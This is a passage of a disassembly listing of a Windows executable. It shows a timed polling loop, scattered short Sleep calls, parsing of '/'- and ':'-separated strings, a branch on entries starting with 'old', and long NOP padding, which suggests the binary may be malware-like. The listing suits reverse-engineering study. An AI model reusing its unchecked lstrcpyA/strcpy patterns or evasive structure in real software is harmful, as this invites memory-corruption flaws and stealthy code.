call dword_4130C8 ; lstrcpynA
push 19h
call dword_4130E0 ; Sleep
mov ecx, [ebp+var_10]
mov [ebp+ecx+var_1F90], 0
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_2808]
push ecx
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_4030F7
mov [ebp+var_28BC], eax
mov edx, [ebp+var_28BC]
mov [ebp+var_28C0], edx
mov byte ptr [ebp+var_4], 15h
mov ecx, [ebp+var_28C0]
call sub_4026A0
push eax
lea eax, [ebp+var_1F90]
push eax
call dword_4130CC ; lstrcpyA
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_2808]
call sub_411512
lea ecx, [ebp+var_1F90]
push ecx
lea ecx, [ebp+var_1C]
call sub_409670
push 19h
call dword_4130E0 ; Sleep
lea ecx, [ebp+var_1C]
call sub_409720
cmp eax, 64h
jnb short loc_408A03
lea ecx, [ebp+var_1C]
call sub_4096F0
push eax
call dword_413274
mov [ebp+var_280C], 0FFFFFFFFh
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_14]
call sub_411512
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_4041A5
mov eax, [ebp+var_280C]
jmp loc_408D91
; ---------------------------------------------------------------------------
loc_408A03: ; CODE XREF: sub_40831F+68B�j
push 0
lea ecx, [ebp+var_1F9C]
call sub_409B80
mov byte ptr [ebp+var_4], 16h
push 7
push 0
push offset byte_4132B8
lea ecx, [ebp+var_1F9C]
call sub_409C00
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jge short loc_408AA6
push 0
push 0
mov edx, [ebp+var_50]
push edx
lea ecx, [ebp+var_27AC]
call sub_4099B0
mov [ebp+var_2810], 0FFFFFFFEh
lea ecx, [ebp+var_27AC]
call sub_409A40
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_1F9C]
call sub_409BB0
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_14]
call sub_411512
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_4041A5
mov eax, [ebp+var_2810]
jmp loc_408D91
; ---------------------------------------------------------------------------
loc_408AA6: ; CODE XREF: sub_40831F+710�j
lea ecx, [ebp+var_34]
call sub_4097D0
mov byte ptr [ebp+var_4], 17h
push ecx
mov ecx, esp
mov [ebp+var_2814], esp
lea eax, [ebp+var_1C]
push eax
call sub_409640
mov [ebp+var_28C4], eax
mov ecx, [ebp+var_28C4]
mov [ebp+var_28C8], ecx
mov byte ptr [ebp+var_4], 18h
lea ecx, [ebp+var_1F9C]
call sub_409BD0
mov ecx, eax
mov byte ptr [ebp+var_4], 17h
call sub_409AF0
mov [ebp+var_28CA], ax
mov dx, [ebp+var_28CA]
push edx
lea ecx, [ebp+var_34]
call sub_409880
mov [ebp+var_4C], 0FFFFFFFFh
call dword_413028 ; RtlGetLastWin32Error
mov [ebp+var_4C], eax
lea ecx, [ebp+var_34]
call sub_4097F0
and eax, 0FFh
cmp eax, 1
jnz loc_408CB5
lea ecx, [ebp+var_27B0]
call sub_409CB0
mov byte ptr [ebp+var_4], 19h
lea eax, [ebp+var_2818]
push eax
lea ecx, [ebp+var_1F9C]
call sub_409BD0
mov ecx, eax
call sub_409A90
mov [ebp+var_28D0], eax
mov ecx, [ebp+var_28D0]
push ecx
lea ecx, [ebp+var_27B0]
call sub_409D30
lea ecx, [ebp+var_2818]
call sub_406293
push ecx
mov ecx, esp
mov [ebp+var_281C], esp
lea edx, [ebp+var_27B0]
push edx
call sub_409CD0
mov [ebp+var_28D4], eax
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_404484
mov [ebp+var_28D8], eax
mov eax, [ebp+var_28D8]
mov [ebp+var_1F98], eax
mov ecx, [ebp+var_1F98]
imul ecx, 1400Ch
mov [ebp+var_27B4], ecx
cmp [ebp+var_1F98], 0
jnz short loc_408BE6
mov edx, [ebp+var_27B4]
push edx
call dword_4131C8 ; malloc
add esp, 4
mov [ebp+var_27B8], eax
jmp short loc_408BFC
; ---------------------------------------------------------------------------
loc_408BE6: ; CODE XREF: sub_40831F+8AD�j
mov eax, [ebp+var_27B4]
push eax
call dword_4131C8 ; malloc
add esp, 4
mov [ebp+var_27B8], eax
loc_408BFC: ; CODE XREF: sub_40831F+8C5�j
mov ecx, [ebp+var_27B4]
push ecx
push 0
mov edx, [ebp+var_27B8]
push edx
call sub_411622 ; memset
add esp, 0Ch
push 19h
call dword_4130E0 ; Sleep
mov eax, [ebp+var_1F98]
push eax
mov ecx, [ebp+var_27B8]
push ecx
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_4033A7
push 18h
call dword_4130E0 ; Sleep
mov edx, [ebp+var_27B8]
push edx
push ecx
mov ecx, esp
mov [ebp+var_2820], esp
lea eax, [ebp+var_27B0]
push eax
call sub_409CD0
mov [ebp+var_28DC], eax
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_403488
push 17h
call dword_4130E0 ; Sleep
mov ecx, [ebp+var_1F98]
push ecx
mov edx, [ebp+var_27B8]
push edx
mov ecx, [ebp+var_282C]
add ecx, 8
call sub_404605
mov eax, [ebp+var_27B8]
push eax
call dword_4131D4 ; free
add esp, 4
mov byte ptr [ebp+var_4], 17h
lea ecx, [ebp+var_27B0]
call sub_406293
jmp short loc_408D24
; ---------------------------------------------------------------------------
loc_408CB5: ; CODE XREF: sub_40831F+808�j
lea ecx, [ebp+var_1C]
call sub_4096F0
push eax
call dword_413274
mov [ebp+var_2824], 0FFFFFFFDh
mov byte ptr [ebp+var_4], 16h
lea ecx, [ebp+var_34]
call sub_409990
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_1F9C]
call sub_409BB0
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_14]
call sub_411512
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_4041A5
mov eax, [ebp+var_2824]
jmp short loc_408D91
; ---------------------------------------------------------------------------
loc_408D24: ; CODE XREF: sub_40831F+994�j
lea ecx, [ebp+var_1C]
call sub_4096F0
push eax
call dword_413274
mov [ebp+var_2828], 1
mov byte ptr [ebp+var_4], 16h
lea ecx, [ebp+var_34]
call sub_409990
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_1F9C]
call sub_409BB0
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_14]
call sub_411512
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_24]
call sub_411512
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_18]
call sub_411512
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_4041A5
mov eax, [ebp+var_2828]
loc_408D91: ; CODE XREF: sub_40831F+5DE�j
; sub_40831F+6DF�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_40831F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D9F proc near ; CODE XREF: sub_4091F5+B0�p
var_807C = dword ptr -807Ch
var_8078 = dword ptr -8078h
var_8074 = dword ptr -8074h
var_8070 = dword ptr -8070h
var_806C = dword ptr -806Ch
var_8068 = dword ptr -8068h
var_8064 = dword ptr -8064h
var_8060 = dword ptr -8060h
var_805C = dword ptr -805Ch
var_8058 = dword ptr -8058h
var_8054 = dword ptr -8054h
var_8050 = dword ptr -8050h
var_804C = dword ptr -804Ch
var_8048 = dword ptr -8048h
var_8044 = dword ptr -8044h
var_8040 = byte ptr -8040h
var_803C = byte ptr -803Ch
var_8038 = byte ptr -8038h
var_8034 = byte ptr -8034h
var_8030 = byte ptr -8030h
var_802C = byte ptr -802Ch
var_8028 = byte ptr -8028h
var_8024 = byte ptr -8024h
var_8020 = byte ptr -8020h
var_801C = byte ptr -801Ch
var_8018 = dword ptr -8018h
var_8014 = byte ptr -8014h
var_6014 = byte ptr -6014h
var_4014 = byte ptr -4014h
var_4010 = byte ptr -4010h
var_2010 = byte ptr -2010h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_408D9F
mov eax, large fs:0
push eax
mov large fs:0, esp
mov eax, 8070h
call sub_4115D0
mov [ebp+var_8044], ecx
mov [ebp+var_801C], 1
lea ecx, [ebp+var_4014]
call sub_41151E
mov [ebp+var_4], 0
push offset dword_41BCD0
lea ecx, [ebp+var_4014]
call sub_411518
lea ecx, [ebp+var_4014]
call sub_408070
test eax, eax
jnz short loc_408E4B
lea eax, [ebp+var_8024]
push eax
mov ecx, [ebp+var_8044]
add ecx, 8
call sub_405A64
mov [ebp+var_8048], eax
mov ecx, [ebp+var_8048]
mov [ebp+var_804C], ecx
mov byte ptr [ebp+var_4], 1
mov edx, [ebp+var_804C]
push edx
lea ecx, [ebp+var_4014]
call sub_411518
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8024]
call sub_411512
loc_408E4B: ; CODE XREF: sub_408D9F+5E�j
lea ecx, [ebp+var_4014]
call sub_4026A0
push eax
lea eax, [ebp+var_6014]
push eax
call dword_4130CC ; lstrcpyA
lea ecx, [ebp+var_6014]
push ecx
call dword_4130BC ; lstrlenA
push eax
lea edx, [ebp+var_6014]
push edx
lea eax, [ebp+var_8028]
push eax
mov ecx, [ebp+var_8044]
add ecx, 8
call sub_4030F7
mov [ebp+var_8050], eax
mov ecx, [ebp+var_8050]
mov [ebp+var_8054], ecx
mov byte ptr [ebp+var_4], 2
mov edx, [ebp+var_8054]
push edx
lea ecx, [ebp+var_4014]
call sub_411518
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8028]
call sub_411512
lea ecx, [ebp+var_4014]
call sub_4026A0
push eax
lea eax, [ebp+var_8014]
push eax
call dword_41329C ; wsprintfA
add esp, 8
movsx ecx, [ebp+var_8014]
cmp ecx, 2Fh
jnz loc_4091AA
push 0
push 1
lea edx, [ebp+var_8014]
push edx
lea eax, [ebp+var_802C]
push eax
lea ecx, [ebp+var_8020]
call sub_401ACF
mov [ebp+var_8058], eax
mov ecx, [ebp+var_8058]
mov [ebp+var_805C], ecx
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_805C]
call sub_4026A0
push eax
lea edx, [ebp+var_8014]
push edx
call sub_411628 ; strcpy
add esp, 8
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_802C]
call sub_411512
loc_408F4E: ; CODE XREF: sub_408D9F:loc_4091A5�j
push 2Fh
lea eax, [ebp+var_8014]
push eax
lea ecx, [ebp+var_8020]
call sub_401A20
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_4091AA
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_408F8B
lea ecx, [ebp+var_8014]
push ecx
lea edx, [ebp+var_4010]
push edx
call dword_4130CC ; lstrcpyA
jmp short loc_408FE8
; ---------------------------------------------------------------------------
loc_408F8B: ; CODE XREF: sub_408D9F+1D4�j
mov eax, [ebp+var_10]
push eax
push 0
lea ecx, [ebp+var_8014]
push ecx
lea edx, [ebp+var_8030]
push edx
lea ecx, [ebp+var_8020]
call sub_401ACF
mov [ebp+var_8060], eax
mov eax, [ebp+var_8060]
mov [ebp+var_8064], eax
mov byte ptr [ebp+var_4], 4
mov ecx, [ebp+var_8064]
call sub_4026A0
push eax
lea ecx, [ebp+var_4010]
push ecx
call dword_4130CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8030]
call sub_411512
loc_408FE8: ; CODE XREF: sub_408D9F+1EA�j
push 0
mov edx, [ebp+var_10]
add edx, 1
push edx
lea eax, [ebp+var_8014]
push eax
lea ecx, [ebp+var_8034]
push ecx
lea ecx, [ebp+var_8020]
call sub_401ACF
mov [ebp+var_8068], eax
mov edx, [ebp+var_8068]
mov [ebp+var_806C], edx
mov byte ptr [ebp+var_4], 5
mov ecx, [ebp+var_806C]
call sub_4026A0
push eax
lea eax, [ebp+var_8014]
push eax
call dword_4130CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8034]
call sub_411512
push 3Ah
lea ecx, [ebp+var_4010]
push ecx
lea ecx, [ebp+var_8020]
call sub_401A20
mov [ebp+var_8018], eax
cmp [ebp+var_8018], 0FFFFFFFFh
jz loc_409134
mov edx, [ebp+var_8018]
push edx
push 0
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_8038]
push ecx
lea ecx, [ebp+var_8020]
call sub_401ACF
mov [ebp+var_8070], eax
mov edx, [ebp+var_8070]
mov [ebp+var_8074], edx
mov byte ptr [ebp+var_4], 6
mov ecx, [ebp+var_8074]
call sub_4026A0
push eax
lea eax, [ebp+var_2010]
push eax
call dword_4130CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8038]
call sub_411512
push 0
mov ecx, [ebp+var_8018]
add ecx, 1
push ecx
lea edx, [ebp+var_4010]
push edx
lea eax, [ebp+var_803C]
push eax
lea ecx, [ebp+var_8020]
call sub_401ACF
mov [ebp+var_8078], eax
mov ecx, [ebp+var_8078]
mov [ebp+var_807C], ecx
mov byte ptr [ebp+var_4], 7
mov ecx, [ebp+var_807C]
call sub_4026A0
push eax
lea edx, [ebp+var_4010]
push edx
call dword_4130CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_803C]
call sub_411512
jmp short loc_40915E
; ---------------------------------------------------------------------------
loc_409134: ; CODE XREF: sub_408D9F+2CA�j
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_2010]
push ecx
call dword_4130CC ; lstrcpyA
push 2000h
push 0
lea edx, [ebp+var_4010]
push edx
call sub_411622 ; memset
add esp, 0Ch
loc_40915E: ; CODE XREF: sub_408D9F+393�j
push 3
push offset aOld ; "old"
lea eax, [ebp+var_2010]
push eax
call dword_4131AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40919D
lea ecx, [ebp+var_4010]
push ecx
call sub_4021DB
add esp, 4
test eax, eax
jz short loc_40919D
push 1
lea edx, [ebp+var_4010]
push edx
call sub_401C92
add esp, 8
loc_40919D: ; CODE XREF: sub_408D9F+3D8�j
; sub_408D9F+3EB�j
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_4091A5
jmp short loc_4091AA
; ---------------------------------------------------------------------------
loc_4091A5: ; CODE XREF: sub_408D9F+402�j
jmp loc_408F4E
; ---------------------------------------------------------------------------
loc_4091AA: ; CODE XREF: sub_408D9F+14C�j
; sub_408D9F+1CA�j ...
mov ecx, [ebp+var_8044]
add ecx, 10h
call sub_408070
test eax, eax
jnz short loc_4091C3
mov [ebp+var_801C], 0
loc_4091C3: ; CODE XREF: sub_408D9F+41B�j
mov al, [ebp+var_801C]
mov [ebp+var_8040], al
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4014]
call sub_411512
mov al, [ebp+var_8040]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_408D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091F5 proc near ; CODE XREF: sub_4093D8+F4�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4091F5
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_28], ecx
mov [ebp+var_4], 0
lea eax, [ebp+var_14]
push eax
call dword_4131A4 ; time
add esp, 4
mov ecx, [ebp+var_28]
add ecx, 2040h
push ecx
mov edx, esp
mov [ebp+var_20], esp
push ecx
mov ecx, edx
call sub_411506
mov [ebp+var_2C], eax
mov ecx, [ebp+var_28]
add ecx, 8
call sub_405E1F
push 1Eh
call dword_4130E0 ; Sleep
push 0
mov ecx, [ebp+var_28]
add ecx, 8
call sub_40543F
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov ecx, [ebp+var_30]
mov [eax], ecx
mov [ebp+var_18], 2
push 20h
call dword_4130E0 ; Sleep
loc_409282: ; CODE XREF: sub_4091F5:loc_40939F�j
mov edx, [ebp+var_28]
xor eax, eax
mov al, [edx+20h]
test eax, eax
jnz loc_4093A4
cmp [ebp+var_18], 2
jnz loc_4093A4
cmp [ebp+var_18], 0
jle short loc_4092AA
mov ecx, [ebp+var_28]
call sub_408D9F
loc_4092AA: ; CODE XREF: sub_4091F5+AB�j
; sub_4091F5+E1�j
cmp [ebp+var_18], 0
jle short loc_4092BB
push 855h
call dword_4130E0 ; Sleep
loc_4092BB: ; CODE XREF: sub_4091F5+B9�j
cmp [ebp+var_18], 0FFFFFFFFh
jle short loc_4092CE
lea ecx, [ebp+var_14]
push ecx
call dword_4131A4 ; time
add esp, 4
loc_4092CE: ; CODE XREF: sub_4091F5+CA�j
mov edx, [ebp+var_28]
mov eax, [edx]
cmp eax, [ebp+var_14]
jg short loc_4092AA
push 0
call dword_4132B0
test eax, eax
jge short loc_4092EB
xor al, al
jmp loc_4093C7
; ---------------------------------------------------------------------------
loc_4092EB: ; CODE XREF: sub_4091F5+ED�j
mov ecx, [ebp+var_28]
call sub_40831F
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
mov [ebp+var_1C], ecx
push 22h
call dword_4130E0 ; Sleep
call dword_4132A4
push 20h
call dword_4130E0 ; Sleep
cmp [ebp+var_1C], 0
jle short loc_409332
push 0
mov ecx, [ebp+var_28]
add ecx, 8
call sub_40543F
mov [ebp+var_38], eax
mov edx, [ebp+var_28]
mov eax, [ebp+var_38]
mov [edx], eax
jmp short loc_40935D
; ---------------------------------------------------------------------------
loc_409332: ; CODE XREF: sub_4091F5+121�j
push 1Ch
call dword_4130E0 ; Sleep
push 15182h
mov ecx, [ebp+var_28]
add ecx, 8
call sub_40543F
mov [ebp+var_3C], eax
mov ecx, [ebp+var_28]
mov edx, [ebp+var_3C]
mov [ecx], edx
push 1Dh
call dword_4130E0 ; Sleep
loc_40935D: ; CODE XREF: sub_4091F5+13B�j
lea eax, [ebp+var_14]
push eax
call dword_4131A4 ; time
add esp, 4
mov ecx, [ebp+var_28]
mov edx, [ecx]
cmp edx, [ebp+var_14]
jge short loc_40939F
push 1Eh
call dword_4130E0 ; Sleep
push 15181h
mov ecx, [ebp+var_28]
add ecx, 8
call sub_40543F
mov [ebp+var_40], eax
mov eax, [ebp+var_28]
mov ecx, [ebp+var_40]
mov [eax], ecx
push 1Fh
call dword_4130E0 ; Sleep
loc_40939F: ; CODE XREF: sub_4091F5+17D�j
jmp loc_409282
; ---------------------------------------------------------------------------
loc_4093A4: ; CODE XREF: sub_4091F5+97�j
; sub_4091F5+A1�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
jmp short loc_4093BE
; ---------------------------------------------------------------------------
loc_4093AF: ; DATA XREF: HSho:00415D44�o
mov [ebp+var_24], 0
mov eax, offset loc_4093B9
retn
; ---------------------------------------------------------------------------
loc_4093B9: ; DATA XREF: sub_4091F5+1BE�o
mov al, [ebp+var_24]
jmp short loc_4093C7
; ---------------------------------------------------------------------------
loc_4093BE: ; CODE XREF: sub_4091F5+1B8�j
mov [ebp+var_4], 0FFFFFFFFh
mov al, 1
loc_4093C7: ; CODE XREF: sub_4091F5+F1�j
; sub_4091F5+1C7�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4091F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093D8 proc near ; CODE XREF: HSho:004117B9�p
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, [ebp+arg_8]
push eax
mov ecx, offset dword_41BCD0
call sub_41150C
push 1Ah
call dword_4130E0 ; Sleep
mov ecx, offset dword_419C90
call sub_4091F5
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
xor eax, eax
pop edi
pop esi
pop ebx
pop ebp
retn 10h
sub_4093D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409540 proc near ; CODE XREF: sub_408310+8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_409540
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 2
mov ecx, [ebp+var_10]
add ecx, 2040h
call sub_411512
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 203Ch
call sub_411512
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 8
call sub_402BB1
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 4
call sub_411512
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_409540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095C0 proc near ; CODE XREF: sub_4082EF+8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4095C0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_10]
add ecx, 4
call sub_41151E
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 8
call sub_402A1E
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 203Ch
call sub_41151E
mov byte ptr [ebp+var_4], 2
mov ecx, [ebp+var_10]
add ecx, 2040h
call sub_41151E
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4095C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409640 proc near ; CODE XREF: sub_40831F+7A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov ecx, [ebp+var_4]
call sub_409750
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_409640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409670 proc near ; CODE XREF: sub_40831F+673�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_409670
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
mov [ebp+var_18], ecx
mov ecx, [ebp+var_18]
call sub_4041A5
push 0Ch
call sub_4114F4
add esp, 4
mov [ebp+var_14], eax
mov [ebp+var_4], 0
cmp [ebp+var_14], 0
jz short loc_4096C1
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_14]
call sub_4041E3
mov [ebp+var_1C], eax
jmp short loc_4096C8
; ---------------------------------------------------------------------------
loc_4096C1: ; CODE XREF: sub_409670+3E�j
mov [ebp+var_1C], 0
loc_4096C8: ; CODE XREF: sub_409670+4F�j
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
mov [ebp+var_4], 0FFFFFFFFh
mov edx, [ebp+var_18]
mov eax, [ebp+var_10]
mov [edx], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_409670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096F0 proc near ; CODE XREF: sub_40831F+690�p
; sub_40831F+999�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_409710
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_409790
mov [ebp+var_8], eax
jmp short loc_409717
; ---------------------------------------------------------------------------
loc_409710: ; CODE XREF: sub_4096F0+F�j
mov [ebp+var_8], 0
loc_409717: ; CODE XREF: sub_4096F0+1E�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4096F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409720 proc near ; CODE XREF: sub_40831F+683�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_409740
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_4097A0
mov [ebp+var_8], eax
jmp short loc_409747
; ---------------------------------------------------------------------------
loc_409740: ; CODE XREF: sub_409720+F�j
mov [ebp+var_8], 0
loc_409747: ; CODE XREF: sub_409720+1E�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_409720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409750 proc near ; CODE XREF: sub_409640+14�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_409769
mov ecx, [ebp+var_4]
mov ecx, [ecx]
call sub_409770
loc_409769: ; CODE XREF: sub_409750+D�j
mov esp, ebp
pop ebp
retn
sub_409750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409770 proc near ; CODE XREF: sub_409750+14�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
add eax, 8
push eax
call dword_4130AC ; InterlockedIncrement
mov ecx, [ebp+var_4]
mov eax, [ecx+8]
mov esp, ebp
pop ebp
retn
sub_409770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409790 proc near ; CODE XREF: sub_4096F0+16�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
mov esp, ebp
pop ebp
retn
sub_409790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A0 proc near ; CODE XREF: sub_409720+16�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_4097C2
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call dword_413278
mov [ebp+var_8], eax
